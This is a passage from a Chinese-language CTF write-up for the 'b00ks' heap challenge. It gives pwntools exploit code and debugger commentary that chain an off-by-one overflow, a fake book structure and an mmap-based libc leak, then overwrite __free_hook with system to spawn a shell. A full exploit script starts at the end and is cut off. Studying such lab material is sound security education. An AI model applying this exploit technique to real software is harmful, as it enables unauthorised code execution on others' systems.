</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">des_size</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;: &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">des</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">deletebook</span><span class="p">(</span><span class="nb">id</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;&gt; &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="s2">&#34;2&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;: &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="nb">id</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">editbook</span><span class="p">(</span><span class="nb">id</span><span class="p">,</span> <span class="n">new_des</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;&gt; &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="s2">&#34;3&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;: &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="nb">id</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;: &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">new_des</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">printbook</span><span class="p">(</span><span class="nb">id</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;&gt; &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="s2">&#34;4&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;: &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">id</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">        <span class="n">book_id</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">io</span><span class="o">.</span><span class="n">readline</span><span class="p">()[:</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span><span class="o">//-</span><span class="mi">1</span><span class="n">为最后一个位置</span>
</span></span><span class="line"><span class="cl">        <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;: &#34;</span><span class="p">)</span>				 <span class="o">//</span><span class="p">[:</span><span class="o">-</span><span class="mi">1</span><span class="p">]:</span><span class="n">从</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span><span class="n">到</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="n">之前的数</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="n">book_name</span> <span class="o">=</span> <span class="n">io</span><span class="o">.</span><span class="n">readline</span><span class="p">()[:</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">        <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;: &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="n">book_des</span> <span class="o">=</span> <span class="n">io</span><span class="o">.</span><span class="n">readline</span><span class="p">()[:</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">        <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;: &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="n">book_author</span> <span class="o">=</span> <span class="n">io</span><span class="o">.</span><span class="n">readline</span><span class="p">()[:</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="n">book_id</span><span class="p">,</span> <span class="n">book_name</span><span class="p">,</span> <span class="n">book_des</span><span class="p">,</span> <span class="n">book_author</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">changeauthor</span><span class="p">(</span><span class="n">authorname</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;&gt; &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="s2">&#34;5&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;: &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">authorname</span><span class="p">)</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h3 id="创建book1">创建book1</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34;author name:&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="s2">&#34;a&#34;</span> <span class="o">*</span> <span class="mi">30</span> <span class="o">+</span> <span class="s2">&#34;bc&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">createbook</span><span class="p">(</span><span class="mi">140</span><span class="p">,</span><span class="s2">&#34;kkbook1&#34;</span><span class="p">,</span><span class="mi">250</span><span class="p">,</span><span class="s2">&#34;haha&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">gdb</span><span class="o">.</span><span class="n">attach</span><span class="p">(</span><span class="n">io</span><span class="p">)</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><img src="/img/b00ks/image-20221025193027006.png"
	
	
	
	loading="lazy"
	
	
></p>
<h3 id="print得book1地址">print得book1地址</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="n">book1_id</span><span class="p">,</span><span class="n">book1_name</span><span class="p">,</span><span class="n">book1_des</span><span class="p">,</span><span class="n">book_author</span> <span class="o">=</span> <span class="n">printbook</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">book1_addr</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">book_author</span><span class="p">[</span><span class="mi">32</span><span class="p">:</span><span class="mi">32</span><span class="o">+</span><span class="mi">6</span><span class="p">]</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span><span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">))</span><span class="c1">#收6个字节最后用&#39;\x00&#39;连接为8字节</span>
</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="s2">&#34;book1_addr --&gt;&#34;</span><span class="o">+</span><span class="nb">hex</span><span class="p">(</span><span class="n">book1_addr</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"><span class="c1">#print(&#34;book1_addr --&gt; 0x%x&#34;%book1_addr) 3行和4行为同样效果</span>
</span></span><span class="line"><span class="cl"><span class="n">gdb</span><span class="o">.</span><span class="n">attach</span><span class="p">(</span><span class="n">io</span><span class="p">)</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>此时0x56180ce02070所指向的空间，由于最后的33位的<code>\x00</code>被book1的指针覆盖，所以打印author_name时c后面的会被打印出来，即为book1地址，如图得到book1的地址</p>
<p><img src="/img/b00ks/image-20221025194124258.png"
	
	
	
	loading="lazy"
	
	
></p>
<h3 id="构造fake_book1">构造fake_book1</h3>
<p>此时通过修改book1的description，使得description的内容为fake_book1</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s2">&#34;a&#34;</span><span class="o">*</span><span class="mi">176</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x01</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">book1_addr</span> <span class="o">+</span> <span class="mh">0x40</span><span class="p">)</span><span class="o">*</span><span class="mi">2</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0xffff</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">editbook</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="n">payload</span><span class="p">)</span> <span class="c1">#fake_book1</span>
</span></span><span class="line"><span class="cl"><span class="n">gdb</span><span class="o">.</span><span class="n">attach</span><span class="p">(</span><span class="n">io</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="c1">#0x01对应于book1,0xffff为description_size，</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><img src="/img/b00ks/image-20221025194929356.png"
	
	
	
	loading="lazy"
	
	
></p>
<p>之后会将460的后两位覆盖为00，所以会指向400位置，此时伪造的fake_book是从description（即350位置）调试好位置后覆盖到的。</p>
<h3 id="创建book2修改author_name">创建book2，修改author_name</h3>
<p>创建book2要尽量使申请空间大，大于0x200000将会使用到mmap的帮助，且<strong>mmap与libc之间存在固定的偏移，即book_name即为mmap地址</strong></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="n">createbook</span><span class="p">(</span><span class="mh">0x21000</span><span class="p">,</span><span class="s2">&#34;/bin/sh&#34;</span><span class="p">,</span><span class="mh">0x21000</span><span class="p">,</span><span class="s2">&#34;/bin/sh&#34;</span><span class="p">)</span><span class="c1">#填充为/bin/sh</span>
</span></span><span class="line"><span class="cl"><span class="n">changeauthor</span><span class="p">(</span><span class="s2">&#34;a&#34;</span><span class="o">*</span><span class="mi">30</span> <span class="o">+</span> <span class="s2">&#34;00&#34;</span><span class="p">)</span><span class="c1">#&#34;00&#34;可以更改为任何两个数</span>
</span></span><span class="line"><span class="cl"><span class="n">gdb</span><span class="o">.</span><span class="n">attach</span><span class="p">(</span><span class="n">io</span><span class="p">)</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><img src="/img/b00ks/image-20221025200239349.png"
	
	
	
	loading="lazy"
	
	
></p>
<p>此时book1指针最后两位被覆盖为00，指向fake_book1，查看发现book1_description（0x00005578657184a0）此时为book2指针指向的book2_description，所以之前的构造fake_book1中的代码中的<code>book1_addr + 0x40</code>实则为计算好的关于book1_addr偏移到book2的description的指针，即：60+40=a0</p>
<p><strong>此时fake_book1中的book_name和description均指向book2的description。可以从图中看出，book2_name - book2_description = e6010 - c4010 = 0x22000，即可得下一步操作中的book_name_addr</strong></p>
<h3 id="输出book1得到book2_description地址">输出book1得到book2_description地址</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="n">book_id</span><span class="p">,</span> <span class="n">book_name</span><span class="p">,</span> <span class="n">book_des</span><span class="p">,</span> <span class="n">book_author</span> <span class="o">=</span> <span class="n">printbook</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">book2_des</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">book_des</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span><span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"><span class="n">book2_name</span> <span class="o">=</span> <span class="n">book2_des</span> <span class="o">+</span> <span class="mh">0x22000</span>
</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="s2">&#34;book2_des_addr --&gt;&#34;</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">book2_des</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="s2">&#34;book2_name_addr --&gt;&#34;</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">book2_name</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"><span class="n">gdb</span><span class="o">.</span><span class="n">attach</span><span class="p">(</span><span class="n">io</span><span class="p">)</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><img src="/img/b00ks/image-20221025202226764.png"
	
	
	
	loading="lazy"
	
	
></p>
<p><img src="/img/b00ks/image-20221025202507871.png"
	
	
	
	loading="lazy"
	
	
></p>
<p>获得book2_description地址和book2_name地址</p>
<h3 id="泄露得到libc地址">泄露得到libc地址</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="n">libc_base</span> <span class="o">=</span> <span class="n">book2_name</span> <span class="o">+</span> <span class="mh">0x21ff0</span>
</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="s2">&#34;libc_base_addr --&gt;&#34;</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">libc_base</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"><span class="n">gdb</span><span class="o">.</span><span class="n">attach</span><span class="p">(</span><span class="n">io</span><span class="p">)</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>通过查看vmmap我们可以知道libc基址，由于mmap申请，mmap与libc之间存在固定的偏移，则申请出来的book2_name也有固定的偏移，如图通过计算0x00007f2bba6b0000 - 0x7f2bba68e010 = 0x21FF0，所以将book2_name+0x21ff0得到libc基址。</p>
<p><img src="/img/b00ks/image-20221025203052919.png"
	
	
	
	loading="lazy"
	
	
></p>
<p><img src="/img/b00ks/image-20221025203210290.png"
	
	
	
	loading="lazy"
	
	
></p>
<p>泄露得到libc基址：</p>
<p><img src="/img/b00ks/image-20221025203346725.png"
	
	
	
	loading="lazy"
	
	
></p>
<h3 id="获得system和free_hook地址">获得system和free_hook地址</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="n">system</span><span class="o">=</span><span class="n">libc_base</span><span class="o">+</span><span class="n">libc</span><span class="o">.</span><span class="n">symbols</span><span class="p">[</span><span class="s1">&#39;system&#39;</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="n">free_hook</span><span class="o">=</span><span class="n">libc_base</span><span class="o">+</span><span class="n">libc</span><span class="o">.</span><span class="n">symbols</span><span class="p">[</span><span class="s1">&#39;__free_hook&#39;</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="s2">&#34;free_hook_addr --&gt;&#34;</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">free_hook</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="s2">&#34;system_addr --&gt;&#34;</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">system</span><span class="p">))</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h3 id="getshell">Getshell</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span><span class="lnt">7
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="n">payload</span><span class="o">=</span><span class="n">p64</span><span class="p">(</span><span class="n">free_hook</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">editbook</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">payload</span><span class="o">=</span><span class="n">p64</span><span class="p">(</span><span class="n">system</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">editbook</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">deletebook</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="c1">#gdb.attach(io)</span>
</span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">interactive</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>先将book1的description修改，即修改的是fake_book的description（0x0000556f9aed84a0），修改后该fake_book1的description的内容为一个指向freehook的指针地址，然后的操作是将freehook改为system。</p>
<p><img src="/img/b00ks/image-20221025203755878.png"
	
	
	
	loading="lazy"
	
	
></p>
<p>此时book2的description为free_hook指针地址</p>
<p><img src="/img/b00ks/image-20221025204108883.png"
	
	
	
	loading="lazy"
	
	
></p>
<p>然后修改book2的description，使得free_hook指针地址指向system，</p>
<p><img src="/img/b00ks/image-20221025204344639.png"
	
	
	
	loading="lazy"
	
	
></p>
<p>最后deletebook，删除book2时，会调用free函数，即也会调用<code>__free_hook</code>函数，相当于调用system函数，当构造book2时，其中的book2_name和book2_description均为<code>/bin/sh</code>，使得进行<code>system(/bin/sh)</code>获得shell。</p>
<p><img src="/img/b00ks/image-20221025204924268.png"
	
	
	
	loading="lazy"
	
	
></p>
<h2 id="完整exp如下">完整exp如下</h2>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span><span class="lnt">23
</span><span class="lnt">24
</span><span class="lnt">25
</span><span class="lnt">26
</span><span class="lnt">27
</span><span class="lnt">28
</span><span class="lnt">29
</span><span class="lnt">30
</span><span class="lnt">31
</span><span class="lnt">32
</span><span class="lnt">33
</span><span class="lnt">34
</span><span class="lnt">35
</span><span class="lnt">36
</span><span class="lnt">37
</span><span class="lnt">38
</span><span class="lnt">39
</span><span class="lnt">40
</span><span class="lnt">41
</span><span class="lnt">42
</span><span class="lnt">43
</span><span class="lnt">44
</span><span class="lnt">45
</span><span class="lnt">46
</span><span class="lnt">47
</span><span class="lnt">48
</span><span class="lnt">49
</span><span class="lnt">50
</span><span class="lnt">51
</span><span class="lnt">52
</span><span class="lnt">53
</span><span class="lnt">54
</span><span class="lnt">55
</span><span class="lnt">56
</span><span class="lnt">57
</span><span class="lnt">58
</span><span class="lnt">59
</span><span class="lnt">60
</span><span class="lnt">61
</span><span class="lnt">62
</span><span class="lnt">63
</span><span class="lnt">64
</span><span class="lnt">65
</span><span class="lnt">66
</span><span class="lnt">67
</span><span class="lnt">68
</span><span class="lnt">69
</span><span class="lnt">70
</span><span class="lnt">71
</span><span class="lnt">72
</span><span class="lnt">73
</span><span class="lnt">74
</span><span class="lnt">75
</span><span class="lnt">76
</span><span class="lnt">77
</span><span class="lnt">78
</span><span class="lnt">79
</span><span class="lnt">80
</span><span class="lnt">81
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>
</span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">log_level</span><span class="o">=</span><span class="s2">&#34;debug&#34;</span>
</span></span><span class="line"><span class="cl"><span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s2">&#34;./b00ks&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="c1">#libc = ELF(&#34;libc-2.27.so&#34;)</span>
</span></span><span class="line"><span class="cl"><span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s2">&#34;/lib/x86_64-linux-gnu/libc.so.6&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">createbook</span><span class="p">(</span><span class="n">name_size</span><span class="p">,</span> <span class="n">name</span><span class="p">,</span> <span class="n">des_size</span><span class="p">,</span> <span class="n">des</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;&gt; &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="s2">&#34;1&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;: &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">name_size</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;: &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">name</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;: &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">des_size</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;: &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">des</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">deletebook</span><span class="p">(</span><span class="nb">id</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;&gt; &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="s2">&#34;2&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;: &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="nb">id</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">editbook</span><span class="p">(</span><span class="nb">id</span><span class="p">,</span> <span class="n">new_des</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;&gt; &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="s2">&#34;3&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;: &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="nb">id</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;: &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">new_des</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">printbook</span><span class="p">(</span><span class="nb">id</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;&gt; &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="s2">&#34;4&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;: &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">id</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">        <span class="n">book_id</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">io</span><span class="o">.</span><span class="n">readline</span><span class="p">()[:</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span>
</span></span><span class="line"><span class="cl">        <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;: &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="n">book_name</span> <span class="o">=</span> <span class="n">io</span><span class="o">.</span><span class="n">readline</span><span class="p">()[:</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">        <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;: &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="n">book_des</span> <span class="o">=</span> <span class="n">io</span><span class="o">.</span><span class="n">readline</span><span class="p">()[:</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">        <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;: &#34;</span><span class="p">)</span>
